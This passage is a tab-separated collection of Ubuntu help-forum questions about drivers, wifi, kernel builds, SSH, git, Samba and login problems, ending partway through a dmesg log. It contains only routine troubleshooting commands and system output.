405253	openvpn and the networkmanager plugin - advanced settings questions	i just set up openvpn and the network manager plugin . i purchased vpn service from privateinternetaccess.com . it works fine but only when the cipher and hmac authentication under the advanced settings are set to `` default '' . when i run this vpn service on mac and windows i am able to adjust these settings . but in ubuntu 13.04 any setting changes from `` default '' results in a connection failure . what are these `` default '' settings for the cipher and hmac ? why ca n't i change them ?
405258	3rd monitor not showing desktop at startup	i just installed ubuntu from win 8 and i have a few transition issues . i have a problem with my 3rd monitor at start up . when desktop shows , the 3rd monitor shows a lot of pixel failures . when i go to display settings and apply the same settings at start up then the 3rd monitor shows correctly again . do i miss something or what is wrong ? specs : ati radeon hd7870 - i have installed the drivers ubuntu recommend through additional drivers asus p8z77-v with intel 3570 cpu ( asus do n't support linux drivers )
405270	xserver no longer loading correctly after login	i seem to be at a dead end regarding my desktop and display drivers . long story short , i bought a vga to hdmi converter for an old external hp monitor ( hp le1901w ) . i hooked it up through my hdmi port and it was working fine for a few days . but then i closed the lid of my laptop , and the machine went into hibernation . since then , the external would n't go on at all , nor would it be detected in the display properties in ubuntu settings . i then proceeded to scratch around online , and got the sharp idea of installing the proper nvidia drivers for my nvidia geforce gt 740m . i did a whole pile of things , like apt-get nvidia-current , jockey-text updates , and more without any luck . i was still at a point where i could revert these changes , and boot back into x without problems , but then i found a site that had a link to a .run driver package installer on the nvidia web site . after this install i was no longer able to revert back to previous configuration . i even uninstalled it , and still , no fix . so basically , my problem is as follows ... i 've disconnected the hdmi display , and all i 'm really trying to do is to get my desktop to work properly again just on my laptop display . when i boot into x , the logon screen comes up fine . when i logon it just goes into a blank black screen with a mouse pointer . i can press ctrl+alt+t to get a terminal window , without a titlebar or anything to resize or move the window around . from there i can launch apps like chromium-browser , one at a time . if i run nautilus , my desktop wallpaper comes back with all the icons on my desktop , but no taskbar , or unity menu or ciaro dock loads . so that 's where i am now , and i am out of options . i would really just like to get the desktop environment back to where it was . the external monitor issue i can do some more research on at a later stage , but right now i need it up and running . a few details on my specs : laptop : hp envy 17 notebook cpu : intel i7-4700mq ( 2.4ghz ) gpu : nvidia geforce gt740m ( 2gb ) os : ubuntu 13.10 ( saucy ) 3.11.0-15-generic i was really hoping someone could possibly point me into the right direction .
405271	internet speed testing software for lubuntu	i want a internet speed testing software for lubuntu which is fully gui .
405273	how to run .apk files on lubuntu 13.10 ?	i have some .apk files and want to run on lubuntu 13.10 . please tell a detailed solution
405276	solve login error iceauthority update ?	when i installed ldap , i login ssh and remotely normally to clients , but when i try to login locally a message appear `` could n't update iceauthority file /home/user ``
405278	installing ubuntu vm on aix machine	i have access to an aix machine but is it possible to install an ubuntu virtual machine on top of it ? -bash-3.00 $ uname -snlrvmaxupffm aix xxxx 109286105 3 5 00068392d900 powerpc ibm,8204-e8a ibm,036568392 040183749f887601 040183749f887600 how could i install an ubuntu os vm on this machine ? -bash-3.00 $ oslevel -g fileset actual level maintenance level -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - bos.rte 5.3.8.0 5.3.0.0 -bash-3.00 $
405279	how to start networking service	when i write below commands it says job failed to start . actually i do n't want to write a command every time . so how can i start my network service automatically ? sudo /etc/init.d/networking start sudo service networking start
405280	how to run adobe illustrator , photoshop and indesign	i 'm using an asus eee pc running ubuntu 13.04 ( it was gnome 12.04 ) . before i installed ubuntu i was using `` windows 7 home premium '' which ran pretty laggy . so i decided using ubuntu . i took a bootable usb with ubuntu 12.04 and dropped the win 7 os of my eee pc . the eee pc does n't have a disk drive included . ubuntu runs the way i expected , superior ! right now i wan na open my adobe illustrator , adobe photoshop and adobe indesign files to edit my projects . in ubuntu with wine , i am unable to install the cs3 , cs4 or cs5 isos cause they split up after mounting . the files could n't load in adobe installer . i tried another option running a portable in wine . this will install but wo n't open . as third option i tried is virtualmachine . but since i dropped the windows boot partition even vm ca n't read this . i am willing to install windows 7 next to my 13.04 , but i need to make a bootable usb for that i guess ? i 'm not an expert in it , i 'm a graphics designer . and right now i really need those files to be opened and edited . can someone help me the easiest way ? just installing cs4 from iso would be the best for me ... but if there any other options help me out !
405283	ca n't use rstudio any more after trying to set up an odbc connection to a postgresql database	i tried to setup an odbc connection from r to my postgresql database located on a server ( package rodbc ) . when trying to connect the connection failed because i entered a wrong username in the dsn connection defined in odbc.ini . so i changed odbc.ini and tried again but then rstudio froze . so i killed the process and tried to start the application again . unfortunately now rstudio did n't start at all anymore ( the app in the launcher blinks but does not open the ui ) . i already uninstalled the application with sudo apt-get purge rstudio and reinstalled it again . i updated and upgraded all packages ... but still the same error . also trying to start the program from terminal typing rstudio does not give any result . so any idea how to debug this and get rstudio working again ? edit : when i start rstudio from terminal with rstudio & it shows me the id 7547 . still this id does n't appear in the processes list in the system monitor .
405285	can not connect to wifi after upgrade to 13.10 ( bcm4313 )	[ edit : the solution provided by chili555 solved my problem . however , note that i further had to remove the drivers `` brcmsmac '' and `` bcma '' from blacklisting in order for them to load at each boot ( files `` broadcom-sta-common.conf '' and `` blacklist-brcmsmac.conf '' , not sure it is needed for both files though ... ) . hope this wo n't lead to any conflicts . ] i 've just upgraded my ubuntu from 12.04 to 13.10 by successive upgades . my main problem after those is that i have trouble to connect to wireless . looking through the net , i saw that many people already met this problem , but neither of the methods i tried to fix it did work : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx after ubuntu upgrade , can not connect to wifi ( wireless ) 13.10 bcm4313 network problems after update the main effect of the bcmwl-kernel-source driver re-installation ( whatever was by the `` softwares & updates '' desktop menu or by the terminal ) was to allow the broadcom card to be detected . unfortunately , my laptop is still not able to connect to the wireless networks ( like for the question : can find network but can not connect to it ubuntu 13.10 ) therefore , i would greatly appreciate any help about that ! many thanks in advance . here some details of my hardware and drivers : $ lspci | grep -i wireless 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) $ uname -a linux ludo-e6530 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux and the wireless network section of sudo lshw *-network description : wireless interface product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 01 serial : 08:3e:8e:50:1c : ee width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : f7600000-f7603fff
405292	drivers for ubuntu 12.04 lts	hi i have installed ubuntu 12.04 lts version . when i open bluetooth it says no adapter found . i own a hp probook 445 g1 . can someone please give me a link for all the drivers ? rfkill list all output , 0 : phy0 : wireless lan soft blocked : no hard blocked : no
405295	build error on kernel 3.13-rc8	first time building a kernel , using the following commands on ubuntu 12.04 lts . i 've done my due diligence to ensure that i have the dependencies listed in the kernel source documentation . $ : ~/ mkdir build-3.13-rc8 $ : ~/ cd linux-dev # location of git source $ : ~/linux-dev make mrproper $ : ~/linux-dev yes `` '' | make o=~/build-3.13-rc8 oldconfig $ : ~/linux-dev make -j4 o=~/build-3.13-rc8 after completion $ : ~/linux-dev cd ../build-3.13-rc8 $ : ~/build-3.13-rc8 sudo make modules_install $ : ~/build-3.13-rc8 sudo make install which results in this output : ( the system is using grub , so the lilo warnings are expected . ) sh /home/jdp/linux-dev/arch/x86/boot/install.sh 3.13.0-rc8 arch/x86/boot/bzimage \ system.map `` /boot '' run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 run-parts : executing /etc/kernel/postinst.d/dkms 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 error ( dkms apport ) : kernel package linux-headers-3.13.0-rc8 is not supported error ! bad return status for module build on kernel : 3.13.0-rc8 ( i686 ) consult /var/lib/dkms/nvidia-304/304.88/build/make.log for more information . error ( dkms apport ) : kernel package linux-headers-3.13.0-rc8 is not supported error ! bad return status for module build on kernel : 3.13.0-rc8 ( i686 ) consult /var/lib/dkms/virtualbox/4.1.12/build/make.log for more information . error ( dkms apport ) : binary package for parallels-kernel-modules : 6.0.13950.714087 not found error ! bad return status for module build on kernel : 3.13.0-rc8 ( i686 ) consult /var/lib/dkms/parallels-kernel-modules/6.0.13950.714087/build/make.log for more information . error ( dkms apport ) : kernel package linux-headers-3.13.0-rc8 is not supported error ! bad return status for module build on kernel : 3.13.0-rc8 ( i686 ) consult /var/lib/dkms/tp-smapi/0.41/build/make.log for more information . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 update-initramfs : generating /boot/initrd.img-3.13.0-rc8 w : mdadm : /etc/mdadm/mdadm.conf defines no arrays . run-parts : executing /etc/kernel/postinst.d/pm-utils 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 run-parts : executing /etc/kernel/postinst.d/update-notifier 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 run-parts : executing /etc/kernel/postinst.d/zz-lilo 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 warning : not updating lilo ; /etc/lilo.conf not found run-parts : executing /etc/kernel/postinst.d/zz-runlilo 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 warning : not updating lilo ; /etc/lilo.conf not found ! run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.13.0-rc8 /boot/vmlinuz-3.13.0-rc8 generating grub.cfg ... found background image : /usr/share/images/desktop-base/desktop-grub.png found linux image : /boot/vmlinuz-3.13.0-rc8 found initrd image : /boot/initrd.img-3.13.0-rc8 found linux image : /boot/vmlinuz-3.12.7 found initrd image : /boot/initrd.img-3.12.7 found linux image : /boot/vmlinuz-3.2.0-58-generic-pae-bak found initrd image : /boot/initrd.img-3.2.0-58-generic-pae-bak [ ... ] edited old kernel images out for the sake of brevity , these were n't put here by myself . [ ... ] found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda1 found ubuntu 12.10 ( 12.10 ) on /dev/sdb1 done and here are a few of the make.log files $ : ~/build-3.13-rc8 $ cat /var/lib/dkms/nvidia-304/304.88/build/make.log dkms make.log for nvidia-304-304.88 for kernel 3.13.0-rc8 ( i686 ) tue jan 14 06:32:46 est 2014 if you are using a linux 2.4 kernel , please make sure you either have configured kernel sources matching your kernel or the correct set of kernel headers installed on your system . if you are using a linux 2.6 kernel , please make sure you have configured kernel sources matching your kernel installed on your system . if you specified a separate output directory using either the `kbuild_output` or the `` o '' kbuild parameter , make sure to specify this directory with the sysout environment variable or with the equivalent `nvidia-installer` command line option . depending on where and how the kernel sources ( or the kernel headers ) were installed , you may need to specify their location with the syssrc environment variable or the equivalent `nvidia-installer` command line option . *** unable to determine the target kernel version . *** make [ 4 ] : *** [ select_makefile ] error 1 $ : ~/build-3.13-rc8 $ cat /var/lib/dkms/virtualbox/4.1.12/build/make.log dkms make.log for virtualbox-4.1.12 for kernel 3.13.0-rc8 ( i686 ) tue jan 14 06:32:46 est 2014 hostcc scripts/kconfig/conf.o hostcc scripts/kconfig/zconf.tab.o hostld scripts/kconfig/conf scripts/kconfig/conf -- silentoldconfig kconfig *** *** configuration file `` .config '' not found ! *** *** please run some configurator ( e.g . `` make oldconfig '' or *** `` make menuconfig '' or `` make xconfig '' ) . *** make [ 7 ] : *** [ silentoldconfig ] error 1 make [ 6 ] : *** [ silentoldconfig ] error 2 syshdr arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h syshdr arch/x86/syscalls/../include/generated/uapi/asm/unistd_64.h syshdr arch/x86/syscalls/../include/generated/uapi/asm/unistd_x32.h systbl arch/x86/syscalls/../include/generated/asm/syscalls_32.h hostcc arch/x86/tools/relocs_32.o hostcc arch/x86/tools/relocs_64.o hostcc arch/x86/tools/relocs_common.o hostld arch/x86/tools/relocs make [ 5 ] : *** no rule to make target `include/config/auto.conf ' , needed by `include/config/kernel.release ' . stop . make [ 4 ] : *** [ all ] error 2 the rest of the make.log files vary slightly but all indicate that they were n't able to locate the .config file ( i 'm assuming during make ) . so i finally get around to my questions : is the .config file not found because i 'm building in an alternate directory ? and/or are these drivers/packages just not supported because of the recentness of the kernel ? and is it bad that mdadm reports that its conf file defines no arrays when the output of : $ : ~/build-3.13-rc8 $ sudo mdadm -- detail -- scan is blank ?
405303	how to fix a distorted kde desktop running on a ati radeon hd 7670m ?	i have installed kubuntu 13.10 on my notebook : cpu : intel i7 gpu : ati radeon hd 7670m i 'm running with a proprietary ati display driver installed . i tried with 13.11beta9.4 and 13.11beta9.95 but the result is the same ! this is what happens :
405306	disable screen touch	i am a begginer in ubuntu and i have some dificulties apart from learning the new os . how can i disable the touch property of the screen ? it has a hardware defect and it thinks that someone is touching the screen constantly . the computer is an acer aspire 1825 ptz .
405311	sane driver for fuji xeros docuprint cm205	running ubuntu 13.10 trying to install fuji xerox docuprint cm205 scanner . when running sane-find-scanner the scanner is not found , is there a driver to support this ?
405325	how to install canon pixma mg 7150 printer	i tried to install my new printer : canon pixma mg7150 ( printer/scanner ) on ubuntu 12.04 lts but till this moment it does n't work . the operating system recognize the printer , but can not find the right drivers . maybe someone can help me with this problem ? thanks ahead , louis .
405348	how do i access my windows files from ubuntu ?	i 've installed ubuntu 12.04.3 as an alternate boot to vista on my pc . when i boot to ubuntu , however , the only hard drives i can see from the gui are the two external usb drives that i have . i can not see the main drive ( what vista calls `` c '' ) from the ubuntu user interface , and therefore , i can not access the bulk of my files and folders on the c drive . i require full access to all of my file systems , and i need to know whether or not ubuntu 12.04.3 has an intuitive way to accomplish that . i would prefer to access them via a gui , but i am ok with a terminal based solution .
405350	can not ssh into running image	i have a cloud setup with eucalyptus and xen . whenever i try to launch an instance , instance gets launched . i can ping the instance with its ip but when i try to ssh into it i get error . here is debug info root @ ubuntu : /home/ankur # ssh -i alice-keypair.private -vvv root @ 192.168.1.4 openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to 192.168.1.4 [ 192.168.1.4 ] port 22. debug1 : connection established . debug1 : permanently_set_uid : 0/0 debug3 : incorrect rsa1 identifier debug3 : could not load `` alice-keypair.private '' as a rsa1 public key debug3 : key_read : missing whitespace debug1 : identity file alice-keypair.private type -1 debug1 : identity file alice-keypair.private-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.3p1 debian-3ubuntu7 debug1 : match : openssh_5.3p1 debian-3ubuntu7 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : loading entries for host `` 192.168.1.4 '' from file `` /root/.ssh/known_hosts '' debug3 : load_hostkeys : loaded 0 keys debug1 : ssh2_msg_kexinit sent connection closed by 192.168.1.4 root @ ubuntu : /home/ankur # i have few questions i can see following two lines debug1 : connecting to 192.168.1.4 [ 192.168.1.4 ] port 22. debug1 : connection established . this means connection is established ? i am not able to understand debug3 : incorrect rsa1 identifier debug3 : could not load `` alice-keypair.private '' as a rsa1 public key debug3 : key_read : missing whitespace what is this ? do it mean my key is currupt ? also what is this debug3 : load_hostkeys : loading entries for host `` 192.168.1.4 '' from file `` /root/.ssh/known_hosts '' debug3 : load_hostkeys : loaded 0 keys what is this loaded 0 keys ? and how to solve this problem ?
405353	video flickering when plymouth splash screen appears on boot	when the computer boots , after loading the kernel , a white flickering appears before it shows the plymouth splash screen . then , between plymouth and the x11 it is perfect ... it is n't flickering . i tried using nomodeset kernel parameter , and it fixes the above mentioned flickering . however , now , when x11 starts , it is changing the video mode several times , flickering a lot . in this case , reading the x11 logs xorg.0.log i realized that it ended up using vesa instead the intel x11 driver . here the xorg.conf configuration file . my video card is an intel 945gm using the i915 kernel driver , compiled into the kernel ( not as kernel module ) . how i can get a smooth video booting , flicker-free ? is it not supposed to plymouth is a flicker-free graphical boot ?
405354	autokey ( autokey-qt ) freezes and wo n't insert text	per some suggestions on here and lifehacker , i began using autokey . it worked great for a week , but as of today it now hangs when i try to enter name new phrases . usually wo n't close when i push the 'x ' in my window manger and no longer responds to my abbreviation phrases . i 've added a few phrases and rebooted since my last successful attempt at using it . another user reported a similar problem for the gtk version of autokey . the results of running it from the command line seems to show some exception errors : exception in thread keypresshandler-thread : traceback ( most recent call last ) : file `` /usr/lib/python2.7/threading.py '' , line 808 , in __bootstrap_inner self.run ( ) file `` /usr/lib/python2.7/dist-packages/autokey/iomediator.py '' , line 202 , in run target.handle_keypress ( rawkey , modifiers , key , windowname , windowclass ) file `` /usr/lib/python2.7/dist-packages/autokey/service.py '' , line 179 , in handle_keypress currentinput , windowinfo , true ) file `` /usr/lib/python2.7/dist-packages/autokey/service.py '' , line 304 , in __checktextmatches if item.check_input ( buffer , windowinfo ) : file `` /usr/lib/python2.7/dist-packages/autokey/model.py '' , line 732 , in check_input abbr = self._should_trigger_abbreviation ( buffer ) file `` /usr/lib/python2.7/dist-packages/autokey/model.py '' , line 131 , in _should_trigger_abbreviation if self.__checkinput ( buffer , abbr ) : file `` /usr/lib/python2.7/dist-packages/autokey/model.py '' , line 144 , in __checkinput stringbefore , typedabbr , stringafter = self._partition_input ( buffer , abbr ) file `` /usr/lib/python2.7/dist-packages/autokey/model.py '' , line 191 , in _partition_input stringbefore , typedabbr , stringafter = currentstring.rpartition ( abbr ) valueerror : empty separator full log here any help would be appreciated .
405355	dvips : how to get correct fonts for eps ( encapsulated postscript ) ?	i have a 12 year old , large latex document with eps figures in it . nowadays , when i try to translate it into pdf , i get the following error message : dvips : font courier used in file pictures/mealyautomat.eps is not in the mapping file . any idea how to fix this ? do i just have to install a certain font package ? the figures were created with the 'tgif ' program a long time ago . i have just installed the 'tgif ' package , and i get : $ tgif fatal error in openfont ( ) : can not open the default ( msg ) font '-*-courier-medium-r-normal-*-14-*-*-*-*-*-iso8859-1 ' . tgif aborted .
405356	help needed to locate specific firefox tabs/windows in unity	i am fairly new to using unity ( using ubuntu 12.04 ) and , although it has a number of features i like , have become utterly frustrated by the difficulty i have in locating specific firefox windows and tabs . i have been used to gnome 2 in which everything stayed exactly where i put it , enabling me to find any open firefox window and any open tab within that . in unity , when i click on the firefox icon i get a mass of thumbnails which only enable me to identify a specific window if i happen to remember which tab was most recently visible . even if i try to open each one in turn to identify the open tabs , the next time i face that screen full of firefox thumbnails they have all shifted position . i ca n't imagine that some convenient mechanism wo n't have been designed to allow the correct tab to be located easily , regardless of which window ( or even workspace ) it might be in , but i have n't been able to find anything in the documentation . to those who know their way around unity this may seem like a very basic and stupid question , but i 'm utterly lost . i would be extremely grateful to anyone who can point me in the right direction . ps i 've tried `` gnome classic '' ( which has lost many of the most useful features of gnome 2 ) , gnome 3 ( which i find even more frustrating than unity ) and xfce4 ( which solves some problems at the expense of others ) .
405362	triple boot osx , win7 , linux - broke my win 7 install	note , this is not really an ubuntu question but i expect there are lots of smart linux gurus here that may know the answer - so please excuse my posting here : i 'm desperately needing help : i 've had a functional dual boot osx ( maveriks ) and win 7 setup for a while and when i created my disk partitions i allowed room for a linux partition . today i installed fedora 20 into the remaining space but now i can no longer boot into windows 7 , i get the message `` no bootable device `` insert boot disk and press any key '' . i 'm using refind for my boot manager . i can boot osx and fedora , but not win7 . any ideas on how to repair my win7 install to boot again ? note , i 'm not trying to have win 7 boot via grub , this is an efi machine ( imac ) and i want to boot directly from refind - as such finding a solution does n't seem as simple as doing some google searching . ( i 've searched a lot and found nothing ) .
405365	no files in /etc/skel/ ; ca n't restore .bashrc	i recently messed up my .bashrc file , which i mentioned in this question : problem with installing android developer files on eclipse - messed up something with .bashrc , and i ca n't find a way to restore .bashrc to its default that works . i ca n't make commands in the terminal because every time i try i receive an error message along the lines of the command could not be located because '/usr/bin ' is not included in the path > environment variable . on other questions i have seen that some recommendations for this problem involve using default files in /etc/skel/ ( problem in .bashrc ) . this wo n't work for me , as i looked in /etc/skel/ , and realized that i have practically no files at all in there ! i do n't know why this is . also , solutions that involve using the terminal do n't seem to work because every time i use the terminal i get the above-mentioned error message . i 'd be really appreciative if anybody could help me solve this problem . i 'm somewhat new to ubuntu , and i 'm having difficulties with this issue .
405368	error with eclipse : `` can not inject update-sites , can not find the correct config ''	i have installed the eclipse framework ( kepler ) , and when i try to find plugins on the eclipse marketplace , i can not seem to install them . the window is hung , and i can only go back and search for other plugins , or cancel . the error in the title appears in the console , and i am not sure what i need to do to correct this .
405369	thunar does n't save settings on exit	every time i reboot my system , thunar loses its settings for view , window dimensions , column widths , etc , and reverts to its installation defaults . i 'm on ubuntu 13.10 64bit , thunar 1.6.3 . is there a way to make it remember its settings ?
405370	bios_grub partition in the way of resizing ubuntu partition	i tried to grow the ext4 partition by shrinking sda4 and then adding the unallocated partition to the ext4 partition , where ubuntu lives . the selected partition , sda6 ( see image ) , contains the bios_grub so i need to move that one . gparted however , wo n't let me . i have `` boot repair disk '' on a dvd , so i figured if i just 'simply delete ' sda6 , assign the unallocated space to the ext4 partition and then booting into `` boot repair disk '' would make everything work like it should . i need some help in this , because i need the extra space . nothing has been done yet , i 'm at the point the above image depicts .
405377	git - url does not appear to be a git repository	i just started using git and now i 'm experiencing a problem . i have a production server and a local development repository . all files on my local master branch should be on the production server . so after every change on the master branch i push to the production server . first time , all files should be pushed obviously . i created a repository on the server and got this message initialized empty git repository in /var/www/my_really_cool_project/.git/ . then i added the remote on the local machine , but whenever pushing it logs '181.910.139.164/var/wwww/my_really_cool_project/.git ' does not appear to be a git repository . i probably made a mistake in the url but i have no idea what the problem is . connection via ssh goes via port 4938 . is anyone able to tell me what the problem is here ? i 'm really stuck on this . this is the output of git remote show origin : fatal : '181.910.139.164/var/wwww/my_really_cool_project/.git ' does not appear to be a git repository fatal : could not read from remote repository . please make sure you have the correct access rights and the repository exists .
405378	why is samba on ubuntu server not asking for a password ?	i have looked at other answers on the web and on this site , but most of them seem to be for people who want to use samba without a password . we have a mostly windows 7 network . we set up samba on our ubuntu server machine . here are the relevant parts of the config file : workgroup = our.windows.domain security = user [ sharename ] comment = my share path = /home/myuser browsable = yes guest ok = no read only = no create mask = 0755 after making these changes to the config file and trying to connect the first time , i got in without a password . anyone on our local network can mount the share \1.2.3.4\sharename without being asked for a password . i want it to ask me for the linux username and password . what step have i missed ? is there any other info you need to help me ? thanks in advance ! jeremy
405379	ubuntu+gnome3 screen not dimming	i have an ubuntu installation with unity and gnome3 . when i log in using unity , if the system is inactive for x minutes , the screen will dim . when using gnome3 the screen never dims . under brightness & lock i selected turn screen off when inative for - > 5 minutes lock - > is not activated . under power i selected suspend when inactive for - > do n't suspend
405382	can not login to ubuntu 13.10 after reboot	for some reason on my system76 bonobo , after a reboot , i try to login and i get a blinking cursor in the top left for a few seconds , than right back to the login screen . it seems like lightdm crashes . i did several things , most of which are outlined in google searches and include reinstalling ubuntu-desktop package , resetting unity ... etc . the strange part is that i can login to the guest account just fine . however , i can not login to a newly created account , same result as my account . i am able to ctrl+alt+f1 and login , than startx . this gets me to an empty desktop with no launcher ... etc . i am able to get the launcher back by using the compiz-configuration-manager app and choosing `` enable ubuntu unity plugin '' , however , than i have an empty panel ( no icons or date/time ) . it seems like an audio issue , because when i finally am back in by doing startx and compiz reset , and goto system settings , i only see `` dummy output '' as an option and have no audio . however , in the guest account it magically works ( as everything does ) . dmesg output : ... [ 2.766190 ] iwlwifi 0000:04:00.0 : irq 47 for msi/msi-x [ 2.766195 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem [ 2.766310 ] cfg80211 : world regulatory domain updated : [ 2.766313 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 2.766315 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2.766316 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2.766318 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 2.766319 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2.766321 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 2.766994 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 0 [ 2.767001 ] nvrm : loading nvidia unix x86_64 kernel module 319.32 wed jun 19 15:51:20 pdt 2013 [ 2.777466 ] iwlwifi 0000:04:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm [ 2.864528 ] sku : nid=0x1d sku_cfg=0x40300001 [ 2.864531 ] sku : port_connectivity=0x1 [ 2.864532 ] sku : enable_pcbeep=0x1 [ 2.864533 ] sku : check_sum=0x00000000 [ 2.864534 ] sku : customization=0x00000000 [ 2.864535 ] sku : external_amp=0x0 [ 2.864536 ] sku : platform_type=0x0 [ 2.864537 ] sku : swap=0x0 [ 2.864538 ] sku : override=0x1 [ 2.864856 ] autoconfig : line_outs=1 ( 0x17/0x0/0x0/0x0/0x0 ) type : line [ 2.864858 ] speaker_outs=1 ( 0x14/0x0/0x0/0x0/0x0 ) [ 2.864859 ] hp_outs=1 ( 0x1b/0x0/0x0/0x0/0x0 ) [ 2.864860 ] mono : mono_out=0x0 [ 2.864861 ] dig-out=0x1e/0x0 [ 2.864862 ] inputs : [ 2.864864 ] internal mic=0x19 [ 2.864865 ] mic=0x18 [ 2.864866 ] line=0x1a [ 2.864868 ] realtek : no valid ssid , checking pincfg 0x40300001 for nid 0x1d [ 2.864869 ] realtek : enabling init asm_id=0x0001 codec_id=10ec0892 [ 2.876512 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 2.876515 ] bluetooth : bnep filters : protocol multicast [ 2.876522 ] bluetooth : bnep socket layer initialized [ 2.877504 ] bluetooth : rfcomm tty layer initialized [ 2.877513 ] bluetooth : rfcomm socket layer initialized [ 2.877514 ] bluetooth : rfcomm ver 1.11 [ 2.878499 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input6 [ 2.878974 ] input : hda intel pch line out as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 2.879090 ] input : hda intel pch line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 2.879172 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 2.884525 ] iwlwifi 0000:04:00.0 : config_iwlwifi_debug disabled [ 2.884529 ] iwlwifi 0000:04:00.0 : config_iwlwifi_debugfs enabled [ 2.884530 ] iwlwifi 0000:04:00.0 : config_iwlwifi_device_tracing enabled [ 2.884532 ] iwlwifi 0000:04:00.0 : config_iwlwifi_p2p disabled [ 2.884534 ] iwlwifi 0000:04:00.0 : detected intel ( r ) centrino ( r ) wireless-n 2230 bgn , rev=0xc8 [ 2.884580 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 2.901667 ] hda_intel : disabling msi [ 2.901676 ] hda-intel 0000:01:00.1 : handle vga-switcheroo audio client [ 2.901711 ] hda-intel 0000:01:00.1 : disabling 64bit dma [ 2.902328 ] acpi device:03 : registered as cooling_device8 [ 2.902373 ] acpi : video device [ pegp ] ( multi-head : yes rom : no post : no ) [ 2.902432 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/device:02/lnxvideo:00/input/input10 [ 2.904975 ] hda-intel 0000:01:00.1 : enable delay in rirb handling [ 2.952048 ] init : failsafe main process ( 702 ) killed by term signal [ 2.980131 ] init : avahi-cups-reload main process ( 761 ) terminated with status 1 [ 2.981341 ] ppdev : user-space parallel port driver [ 2.984355 ] ieee80211 phy0 : selected rate control algorithm 'iwl-agn-rs' [ 3.002179 ] type=1400 audit ( 1389711696.747:8 ) : apparmor= '' status '' operation= '' profile_load '' parent=849 profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=858 comm= '' apparmor_parser '' [ 3.002186 ] type=1400 audit ( 1389711696.747:9 ) : apparmor= '' status '' operation= '' profile_load '' parent=849 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=858 comm= '' apparmor_parser '' [ 3.002772 ] type=1400 audit ( 1389711696.747:10 ) : apparmor= '' status '' operation= '' profile_replace '' parent=849 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=858 comm= '' apparmor_parser '' [ 3.399118 ] r8169 0000:03:00.2 eth0 : link down [ 3.399172 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 3.399380 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 3.400583 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 3.408013 ] iwlwifi 0000:04:00.0 : radio type=0x2-0x0-0x0 [ 3.460451 ] input : hda nvidia hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input11 [ 3.460539 ] input : hda nvidia hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:00.1/sound/card1/input12 [ 3.679244 ] iwlwifi 0000:04:00.0 : l1 disabled ; enabling l0s [ 3.686668 ] iwlwifi 0000:04:00.0 : radio type=0x2-0x0-0x0 [ 3.741997 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 3.742169 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 3.963064 ] psmouse serio2 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 